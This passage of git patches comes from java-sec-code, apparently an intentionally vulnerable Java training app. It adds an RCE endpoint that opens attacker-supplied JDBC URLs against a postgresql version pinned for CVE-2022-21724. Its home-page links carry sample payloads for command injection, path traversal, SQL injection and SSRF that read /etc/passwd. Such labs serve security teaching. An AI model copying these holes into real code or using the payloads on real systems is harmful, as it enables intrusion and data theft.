 import org.springframework.web.util.HtmlUtils;
@@ -17,7 +15,6 @@ public static String getRequestBody(HttpServletRequest request) throws IOExcepti
         return convertStreamToString(in);
     }
 
-
     // https://stackoverflow.com/questions/309424/how-do-i-read-convert-an-inputstream-into-a-string-in-java
     public static String convertStreamToString(java.io.InputStream is) {
         java.util.Scanner s = new java.util.Scanner(is).useDelimiter("\\A");

From cab74a4eaaf4ec18433336c25afcea3fa390761b Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Fri, 24 Mar 2023 17:51:29 +0800
Subject: [PATCH 14/20] fix #70

---
 java-sec-code.iml                             |  4 +-
 pom.xml                                       |  9 +++-
 src/main/java/org/joychou/controller/Rce.java | 14 ++++++
 src/main/java/org/joychou/controller/XXE.java |  2 +-
 src/main/resources/templates/index.html       | 44 +++++++++----------
 5 files changed, 48 insertions(+), 25 deletions(-)

diff --git a/java-sec-code.iml b/java-sec-code.iml
index a20476ae..6946c265 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -212,7 +212,7 @@
     <orderEntry type="library" name="Maven: org.springframework.plugin:spring-plugin-metadata:1.2.0.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: org.mapstruct:mapstruct:1.2.0.Final" level="project" />
     <orderEntry type="library" name="Maven: io.springfox:springfox-swagger-ui:2.9.2" level="project" />
-    <orderEntry type="library" scope="PROVIDED" name="Maven: org.projectlombok:lombok:1.18.16" level="project" />
+    <orderEntry type="library" scope="PROVIDED" name="Maven: org.projectlombok:lombok:1.18.20" level="project" />
     <orderEntry type="library" name="Maven: org.yaml:snakeyaml:1.21" level="project" />
     <orderEntry type="library" name="Maven: org.springframework:spring-test:4.3.6.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: junit:junit:4.12" level="project" />
@@ -228,5 +228,7 @@
     <orderEntry type="library" name="Maven: net.minidev:json-smart:2.2.1" level="project" />
     <orderEntry type="library" name="Maven: net.minidev:accessors-smart:1.1" level="project" />
     <orderEntry type="library" name="Maven: org.xmlbeam:xmlprojector:1.4.13" level="project" />
+    <orderEntry type="library" name="Maven: org.postgresql:postgresql:42.3.1" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: org.checkerframework:checker-qual:3.5.0" level="project" />
   </component>
 </module>
\ No newline at end of file
diff --git a/pom.xml b/pom.xml
index 9ee03372..8da3449d 100644
--- a/pom.xml
+++ b/pom.xml
@@ -260,7 +260,7 @@
         <dependency>
             <groupId>org.projectlombok</groupId>
             <artifactId>lombok</artifactId>
-            <version>1.18.16</version>
+            <version>1.18.20</version>
             <scope>provided</scope>
         </dependency>
 
@@ -330,6 +330,13 @@
             <version>1.4.13</version>
         </dependency>
 
+        <!-- CVE-2022-21724 -->
+        <dependency>
+            <groupId>org.postgresql</groupId>
+            <artifactId>postgresql</artifactId>
+            <version>42.3.1</version>
+        </dependency>
+
     </dependencies>
 
     <dependencyManagement>
diff --git a/src/main/java/org/joychou/controller/Rce.java b/src/main/java/org/joychou/controller/Rce.java
index 6d6a3417..a87a9672 100644
--- a/src/main/java/org/joychou/controller/Rce.java
+++ b/src/main/java/org/joychou/controller/Rce.java
@@ -1,6 +1,7 @@
 package org.joychou.controller;
 
 import groovy.lang.GroovyShell;
+import lombok.extern.slf4j.Slf4j;
 import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.RestController;
@@ -14,6 +15,7 @@
 import java.io.BufferedInputStream;
 import java.io.BufferedReader;
 import java.io.InputStreamReader;
+import java.sql.DriverManager;
 
 
 /**
@@ -21,6 +23,7 @@
  *
  * @author JoyChou @ 2018-05-24
  */
+@Slf4j
 @RestController
 @RequestMapping("/rce")
 public class Rce {
@@ -128,5 +131,16 @@ public void groovyshell(String content) {
         groovyShell.evaluate(content);
     }
 
+    /**
+     * <a href="https://github.com/JoyChou93/java-sec-code/wiki/CVE-2022-21724">CVE-2022-21724</a>
+     */
+    @RequestMapping("/postgresql")
+    public void postgresql(String jdbcUrlBase64) throws Exception{
+        byte[] b = java.util.Base64.getDecoder().decode(jdbcUrlBase64);
+        String jdbcUrl = new String(b);
+        log.info(jdbcUrl);
+        DriverManager.getConnection(jdbcUrl);
+    }
+
 }
 
diff --git a/src/main/java/org/joychou/controller/XXE.java b/src/main/java/org/joychou/controller/XXE.java
index 36372727..08f3073e 100644
--- a/src/main/java/org/joychou/controller/XXE.java
+++ b/src/main/java/org/joychou/controller/XXE.java
@@ -234,7 +234,7 @@ public String DigesterSec(HttpServletRequest request) {
      * Use request.getInputStream to support UTF16 encoding.
      */
     @RequestMapping(value = "/DocumentBuilder/vuln", method = RequestMethod.POST)
-    public String DocumentBuilderVuln01(HttpServletRequest request) {
+    public String DocumentBuilderVuln(HttpServletRequest request) {
         try {
             DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
             DocumentBuilder db = dbf.newDocumentBuilder();
diff --git a/src/main/resources/templates/index.html b/src/main/resources/templates/index.html
index 8511d5fd..057aa067 100644
--- a/src/main/resources/templates/index.html
+++ b/src/main/resources/templates/index.html
@@ -5,29 +5,29 @@
     <title>Home Page</title>
 </head>
 <body>
-    <p>Hello <span th:text="${user}"></span>.</p>
-    <p>Welcome to login java-sec-code application. <a th:href="@{/appInfo}">Application Infomation</a></p>
-    <p>
-        <a th:href="@{/swagger-ui.html}">Swagger</a>&nbsp;&nbsp;
-        <a th:href="@{/codeinject?filepath=/tmp;cat /etc/passwd}">CmdInject</a>&nbsp;&nbsp;
-        <a th:href="@{/jsonp/getToken?_callback=test}">JSONP</a>&nbsp;&nbsp;
-        <a th:href="@{/file/pic}">Picture Upload</a>&nbsp;&nbsp;
-        <a th:href="@{/file/any}">File Upload</a>&nbsp;&nbsp;
-        <a th:href="@{cors/sec/originFilter}">Cors</a>&nbsp;&nbsp;
-        <a th:href="@{/path_traversal/vul?filepath=../../../../../etc/passwd}">PathTraversal</a>&nbsp;&nbsp;
-        <a th:href="@{sqli/mybatis/vuln01?username=joychou' or '1'='1}">SqlInject</a>&nbsp;&nbsp;
-        <a th:href="@{/ssrf/urlConnection/vuln?url=file:///etc/passwd}">SSRF</a>&nbsp;&nbsp;
-        <a th:href="@{/rce/exec?cmd=whoami}">RCE</a>&nbsp;&nbsp;
-        <a th:href="@{/ooxml/upload}">ooxml XXE</a>&nbsp;&nbsp;
-        <a th:href="@{/xlsx-streamer/upload}">xlsx-streamer XXE</a>
-    </p>
+<p>Hello <span th:text="${user}"></span>.</p>
+<p>Welcome to login java-sec-code application. <a th:href="@{/appInfo}">Application Infomation</a></p>
+<p>
+    <a th:href="@{/swagger-ui.html}">Swagger</a>&nbsp;&nbsp;
+    <a th:href="@{/codeinject?filepath=/tmp;cat /etc/passwd}">CmdInject</a>&nbsp;&nbsp;
+    <a th:href="@{/jsonp/getToken?_callback=test}">JSONP</a>&nbsp;&nbsp;
+    <a th:href="@{/file/pic}">Picture Upload</a>&nbsp;&nbsp;
+    <a th:href="@{/file/any}">File Upload</a>&nbsp;&nbsp;
+    <a th:href="@{cors/sec/originFilter}">Cors</a>&nbsp;&nbsp;
+    <a th:href="@{/path_traversal/vul?filepath=../../../../../etc/passwd}">PathTraversal</a>&nbsp;&nbsp;
+    <a th:href="@{sqli/mybatis/vuln01?username=joychou' or '1'='1}">SqlInject</a>&nbsp;&nbsp;
+    <a th:href="@{/ssrf/urlConnection/vuln?url=file:///etc/passwd}">SSRF</a>&nbsp;&nbsp;
+    <a th:href="@{/rce/exec?cmd=whoami}">RCE</a>&nbsp;&nbsp;
+    <a th:href="@{/ooxml/upload}">ooxml XXE</a>&nbsp;&nbsp;
+    <a th:href="@{/xlsx-streamer/upload}">xlsx-streamer XXE</a>
+</p>
 
-    <P>
-        <a th:href="@{/jwt/createToken}">JWTCreateToken</a>
-        <a th:href="@{/jwt/getName}">GetUserFromJWTToken</a>
-    </P>
-    <p>...</p>
-    <a th:href="@{/logout}">logout</a>
+<P>
+    <a th:href="@{/jwt/createToken}">JWTCreateToken</a>
+    <a th:href="@{/jwt/getName}">GetUserFromJWTToken</a>
+</P>
+<p>...</p>
+<a th:href="@{/logout}">logout</a>
 
 </body>
 </html>
\ No newline at end of file

From 4ede83ab929b53c8ad600e1a63c961433e82a97d Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Fri, 28 Apr 2023 11:28:50 +0800
Subject: [PATCH 15/20] add jdbc & actuator ak_secret

---
 java-sec-code.iml                             | 228 +-----------------
 pom.xml                                       |   7 +
 .../java/org/joychou/controller/Jdbc.java     |  36 +++
 .../java/org/joychou/controller/Log4j.java    |   5 +
 src/main/java/org/joychou/controller/Rce.java |  17 +-
 src/main/java/org/joychou/controller/XXE.java |   2 +-
 .../joychou/security/ssrf/SSRFChecker.java    |  77 +++---
 src/main/resources/application.properties     |   5 +-
 src/main/resources/templates/index.html       |   1 +
 9 files changed, 104 insertions(+), 274 deletions(-)
 create mode 100644 src/main/java/org/joychou/controller/Jdbc.java

diff --git a/java-sec-code.iml b/java-sec-code.iml
index 6946c265..1daccaec 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -1,234 +1,8 @@
 <?xml version="1.0" encoding="UTF-8"?>
-<module org.jetbrains.idea.maven.project.MavenProjectsManager.isMavenModule="true" type="JAVA_MODULE" version="4">
+<module version="4">
   <component name="FacetManager">
     <facet type="Spring" name="Spring">
       <configuration />
     </facet>
-    <facet type="web" name="Web">
-      <configuration>
-        <webroots>
-          <root url="file://$MODULE_DIR$/src/main/webapp" relative="/" />
-        </webroots>
-      </configuration>
-    </facet>
-  </component>
-  <component name="NewModuleRootManager" LANGUAGE_LEVEL="JDK_1_8">
-    <output url="file://$MODULE_DIR$/target/classes" />
-    <output-test url="file://$MODULE_DIR$/target/test-classes" />
-    <content url="file://$MODULE_DIR$">
-      <sourceFolder url="file://$MODULE_DIR$/src/main/java" isTestSource="false" />
-      <sourceFolder url="file://$MODULE_DIR$/src/main/resources" type="java-resource" />
-      <excludeFolder url="file://$MODULE_DIR$/target" />
-    </content>
-    <orderEntry type="inheritedJdk" />
-    <orderEntry type="sourceFolder" forTests="false" />
-    <orderEntry type="module-library">
-      <library>
-        <CLASSES>
-          <root url="jar://$USER_HOME$/Desktop/challenge-0.0.1-SNAPSHOT.jar!/" />
-        </CLASSES>
-        <JAVADOC />
-        <SOURCES />
-      </library>
-    </orderEntry>
-    <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-web:1.5.1.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter:1.5.1.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot:1.5.1.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-autoconfigure:1.5.1.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-logging:1.5.1.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: ch.qos.logback:logback-classic:1.1.9" level="project" />
-    <orderEntry type="library" name="Maven: ch.qos.logback:logback-core:1.1.9" level="project" />
-    <orderEntry type="library" name="Maven: org.slf4j:jul-to-slf4j:1.7.22" level="project" />
-    <orderEntry type="library" name="Maven: org.slf4j:log4j-over-slf4j:1.7.22" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-tomcat:1.5.1.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-core:8.5.85" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.tomcat:tomcat-annotations-api:8.5.85" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-el:8.5.85" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-websocket:8.5.85" level="project" />
-    <orderEntry type="library" name="Maven: org.hibernate:hibernate-validator:5.3.4.Final" level="project" />
-    <orderEntry type="library" name="Maven: javax.validation:validation-api:1.1.0.Final" level="project" />
-    <orderEntry type="library" name="Maven: org.jboss.logging:jboss-logging:3.3.0.Final" level="project" />
-    <orderEntry type="library" name="Maven: com.fasterxml.jackson.core:jackson-databind:2.8.6" level="project" />
-    <orderEntry type="library" name="Maven: com.fasterxml.jackson.core:jackson-annotations:2.8.0" level="project" />
-    <orderEntry type="library" name="Maven: com.fasterxml.jackson.core:jackson-core:2.8.6" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework:spring-web:4.3.6.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework:spring-webmvc:4.3.6.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-thymeleaf:1.5.1.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.thymeleaf:thymeleaf-spring4:2.1.5.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.thymeleaf:thymeleaf:2.1.5.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: ognl:ognl:3.0.8" level="project" />
-    <orderEntry type="library" name="Maven: org.unbescape:unbescape:1.1.0.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: nz.net.ultraq.thymeleaf:thymeleaf-layout-dialect:1.4.0" level="project" />
-    <orderEntry type="library" name="Maven: org.codehaus.groovy:groovy:2.4.7" level="project" />
-    <orderEntry type="library" name="Maven: mysql:mysql-connector-java:8.0.12" level="project" />
-    <orderEntry type="library" name="Maven: com.google.protobuf:protobuf-java:2.6.0" level="project" />
-    <orderEntry type="library" name="Maven: com.alibaba:fastjson:1.2.24" level="project" />
-    <orderEntry type="library" name="Maven: org.jdom:jdom2:2.0.6" level="project" />
-    <orderEntry type="library" name="Maven: org.dom4j:dom4j:2.1.0" level="project" />
-    <orderEntry type="library" name="Maven: jaxen:jaxen:1.1.6" level="project" />
-    <orderEntry type="library" name="Maven: com.google.guava:guava:23.0" level="project" />
-    <orderEntry type="library" name="Maven: com.google.code.findbugs:jsr305:1.3.9" level="project" />
-    <orderEntry type="library" name="Maven: com.google.errorprone:error_prone_annotations:2.0.18" level="project" />
-    <orderEntry type="library" name="Maven: com.google.j2objc:j2objc-annotations:1.1" level="project" />
-    <orderEntry type="library" name="Maven: org.codehaus.mojo:animal-sniffer-annotations:1.14" level="project" />
-    <orderEntry type="library" name="Maven: commons-collections:commons-collections:3.1" level="project" />
-    <orderEntry type="library" name="Maven: commons-lang:commons-lang:2.4" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.httpcomponents:httpclient:4.5.12" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.httpcomponents:httpcore:4.4.6" level="project" />
-    <orderEntry type="library" name="Maven: commons-codec:commons-codec:1.10" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.httpcomponents:fluent-hc:4.3.6" level="project" />
-    <orderEntry type="library" name="Maven: commons-logging:commons-logging:1.1.3" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.logging.log4j:log4j-core:2.9.1" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.logging.log4j:log4j-api:2.9.1" level="project" />
-    <orderEntry type="library" name="Maven: com.squareup.okhttp:okhttp:2.5.0" level="project" />
-    <orderEntry type="library" name="Maven: com.squareup.okio:okio:1.6.0" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.commons:commons-digester3:3.2" level="project" />
-    <orderEntry type="library" name="Maven: cglib:cglib:2.2.2" level="project" />
-    <orderEntry type="library" name="Maven: asm:asm:3.3.1" level="project" />
-    <orderEntry type="library" name="Maven: org.jolokia:jolokia-core:1.6.0" level="project" />
-    <orderEntry type="library" name="Maven: com.googlecode.json-simple:json-simple:1.1.1" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-actuator:1.5.1.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-actuator:1.5.1.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.cloud:spring-cloud-starter-netflix-eureka-client:1.4.0.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.cloud:spring-cloud-starter:1.1.3.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.cloud:spring-cloud-context:1.1.3.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.security:spring-security-crypto:4.2.1.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.cloud:spring-cloud-commons:1.1.3.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.security:spring-security-rsa:1.0.3.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.bouncycastle:bcpkix-jdk15on:1.55" level="project" />
-    <orderEntry type="library" name="Maven: org.bouncycastle:bcprov-jdk15on:1.55" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.cloud:spring-cloud-netflix-core:1.2.0.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.cloud:spring-cloud-netflix-eureka-client:1.2.0.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: com.netflix.eureka:eureka-client:1.4.11" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: org.codehaus.jettison:jettison:1.3.7" level="project" />
-    <orderEntry type="library" name="Maven: stax:stax-api:1.0.1" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.netflix-commons:netflix-eventbus:0.3.0" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.netflix-commons:netflix-infix:0.3.0" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: commons-jxpath:commons-jxpath:1.3" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: joda-time:joda-time:2.9.7" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: org.antlr:antlr-runtime:3.4" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: org.antlr:stringtemplate:3.2.1" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: antlr:antlr:2.7.7" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.google.code.gson:gson:2.8.0" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: org.apache.commons:commons-math:2.2" level="project" />
-    <orderEntry type="library" name="Maven: com.netflix.archaius:archaius-core:0.7.4" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: javax.ws.rs:jsr311-api:1.1.1" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.servo:servo-core:0.10.1" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.servo:servo-internal:0.10.1" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.sun.jersey:jersey-core:1.19.1" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.sun.jersey:jersey-client:1.19.1" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.sun.jersey.contribs:jersey-apache-client4:1.19.1" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.google.inject:guice:4.0" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: javax.inject:javax.inject:1" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.governator:governator-api:1.12.10" level="project" />
-    <orderEntry type="library" name="Maven: com.netflix.eureka:eureka-core:1.4.11" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.governator:governator:1.12.10" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.governator:governator-core:1.12.10" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.google.inject.extensions:guice-multibindings:4.0" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.google.inject.extensions:guice-grapher:4.0" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.google.inject.extensions:guice-assistedinject:4.0" level="project" />
-    <orderEntry type="library" name="Maven: org.ow2.asm:asm:5.0.4" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: org.codehaus.woodstox:woodstox-core-asl:4.4.1" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: javax.xml.stream:stax-api:1.0-2" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: org.codehaus.woodstox:stax2-api:3.1.4" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.cloud:spring-cloud-starter-netflix-archaius:1.4.0.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: commons-configuration:commons-configuration:1.8" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.cloud:spring-cloud-starter-netflix-ribbon:1.4.0.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: com.netflix.ribbon:ribbon:2.2.0" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.ribbon:ribbon-transport:2.2.0" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: io.reactivex:rxnetty-contexts:0.4.9" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: io.reactivex:rxnetty-servo:0.4.9" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.hystrix:hystrix-core:1.5.5" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: org.hdrhistogram:HdrHistogram:2.1.9" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: io.reactivex:rxnetty:0.4.9" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: io.netty:netty-codec-http:4.0.27.Final" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: io.netty:netty-codec:4.0.27.Final" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: io.netty:netty-handler:4.0.27.Final" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: io.netty:netty-transport-native-epoll:4.0.27.Final" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: io.netty:netty-common:4.0.27.Final" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: io.netty:netty-buffer:4.0.27.Final" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: io.netty:netty-transport:4.0.27.Final" level="project" />
-    <orderEntry type="library" name="Maven: com.netflix.ribbon:ribbon-core:2.2.0" level="project" />
-    <orderEntry type="library" name="Maven: com.netflix.ribbon:ribbon-httpclient:2.2.0" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.netflix-commons:netflix-commons-util:0.1.1" level="project" />
-    <orderEntry type="library" name="Maven: com.netflix.ribbon:ribbon-loadbalancer:2.2.0" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.netflix-commons:netflix-statistics:0.1.1" level="project" />
-    <orderEntry type="library" name="Maven: io.reactivex:rxjava:1.1.10" level="project" />
-    <orderEntry type="library" name="Maven: com.netflix.ribbon:ribbon-eureka:2.2.0" level="project" />
-    <orderEntry type="library" name="Maven: com.fasterxml.uuid:java-uuid-generator:3.1.4" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.security:spring-security-web:4.2.12.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: aopalliance:aopalliance:1.0" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.security:spring-security-core:4.2.1.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework:spring-beans:4.3.6.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework:spring-context:4.3.6.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework:spring-core:4.3.6.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework:spring-expression:4.3.6.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.security:spring-security-config:4.2.12.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework:spring-aop:4.3.6.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-security:2.1.5.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: commons-net:commons-net:3.6" level="project" />
-    <orderEntry type="library" name="Maven: commons-httpclient:commons-httpclient:3.1" level="project" />
-    <orderEntry type="library" name="Maven: org.mybatis.spring.boot:mybatis-spring-boot-starter:1.3.2" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-jdbc:1.5.1.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.tomcat:tomcat-jdbc:8.5.85" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.tomcat:tomcat-juli:8.5.85" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework:spring-jdbc:4.3.6.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework:spring-tx:4.3.6.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.mybatis.spring.boot:mybatis-spring-boot-autoconfigure:1.3.2" level="project" />
-    <orderEntry type="library" name="Maven: org.mybatis:mybatis:3.4.6" level="project" />
-    <orderEntry type="library" name="Maven: org.mybatis:mybatis-spring:1.3.2" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.velocity:velocity:1.7" level="project" />
-    <orderEntry type="library" name="Maven: com.thoughtworks.xstream:xstream:1.4.10" level="project" />
-    <orderEntry type="library" name="Maven: xmlpull:xmlpull:1.1.3.1" level="project" />
-    <orderEntry type="library" name="Maven: xpp3:xpp3_min:1.1.4c" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.poi:poi:3.10-FINAL" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.poi:poi-ooxml:3.9" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.poi:poi-ooxml-schemas:3.9" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.xmlbeans:xmlbeans:2.3.0" level="project" />
-    <orderEntry type="library" name="Maven: dom4j:dom4j:1.6.1" level="project" />
-    <orderEntry type="library" name="Maven: com.monitorjbl:xlsx-streamer:2.0.0" level="project" />
-    <orderEntry type="library" name="Maven: com.rackspace.apache:xerces2-xsd11:2.11.1" level="project" />
-    <orderEntry type="library" name="Maven: com.rackspace.eclipse.webtools.sourceediting:org.eclipse.wst.xml.xpath2.processor:2.1.100" level="project" />
-    <orderEntry type="library" name="Maven: edu.princeton.cup:java-cup:10k" level="project" />
-    <orderEntry type="library" name="Maven: com.ibm.icu:icu4j:4.6" level="project" />
-    <orderEntry type="library" name="Maven: xml-resolver:xml-resolver:1.2" level="project" />
-    <orderEntry type="library" name="Maven: xml-apis:xml-apis:1.4.01" level="project" />
-    <orderEntry type="library" name="Maven: org.slf4j:slf4j-api:1.7.22" level="project" />
-    <orderEntry type="library" name="Maven: org.jsoup:jsoup:1.10.2" level="project" />
-    <orderEntry type="library" name="Maven: commons-io:commons-io:2.5" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.httpcomponents:httpasyncclient:4.1.4" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.httpcomponents:httpcore-nio:4.4.10" level="project" />
-    <orderEntry type="library" name="Maven: io.springfox:springfox-swagger2:2.9.2" level="project" />
-    <orderEntry type="library" name="Maven: io.swagger:swagger-annotations:1.5.20" level="project" />
-    <orderEntry type="library" name="Maven: io.swagger:swagger-models:1.5.20" level="project" />
-    <orderEntry type="library" name="Maven: io.springfox:springfox-spi:2.9.2" level="project" />
-    <orderEntry type="library" name="Maven: io.springfox:springfox-core:2.9.2" level="project" />
-    <orderEntry type="library" name="Maven: net.bytebuddy:byte-buddy:1.8.12" level="project" />
-    <orderEntry type="library" name="Maven: io.springfox:springfox-schema:2.9.2" level="project" />
-    <orderEntry type="library" name="Maven: io.springfox:springfox-swagger-common:2.9.2" level="project" />
-    <orderEntry type="library" name="Maven: io.springfox:springfox-spring-web:2.9.2" level="project" />
-    <orderEntry type="library" name="Maven: com.fasterxml:classmate:1.3.3" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.plugin:spring-plugin-core:1.2.0.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.plugin:spring-plugin-metadata:1.2.0.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.mapstruct:mapstruct:1.2.0.Final" level="project" />
-    <orderEntry type="library" name="Maven: io.springfox:springfox-swagger-ui:2.9.2" level="project" />
-    <orderEntry type="library" scope="PROVIDED" name="Maven: org.projectlombok:lombok:1.18.20" level="project" />
-    <orderEntry type="library" name="Maven: org.yaml:snakeyaml:1.21" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework:spring-test:4.3.6.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: junit:junit:4.12" level="project" />
-    <orderEntry type="library" name="Maven: org.hamcrest:hamcrest-core:1.3" level="project" />
-    <orderEntry type="library" name="Maven: commons-beanutils:commons-beanutils:1.9.4" level="project" />
-    <orderEntry type="library" name="Maven: io.jsonwebtoken:jjwt:0.9.1" level="project" />
-    <orderEntry type="library" name="Maven: com.auth0:java-jwt:4.0.0" level="project" />
-    <orderEntry type="library" name="Maven: cn.hutool:hutool-all:5.8.10" level="project" />
-    <orderEntry type="library" name="Maven: org.javassist:javassist:3.27.0-GA" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.data:spring-data-commons:1.13.11.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.slf4j:jcl-over-slf4j:1.7.22" level="project" />
-    <orderEntry type="library" name="Maven: com.jayway.jsonpath:json-path:2.2.0" level="project" />
-    <orderEntry type="library" name="Maven: net.minidev:json-smart:2.2.1" level="project" />
-    <orderEntry type="library" name="Maven: net.minidev:accessors-smart:1.1" level="project" />
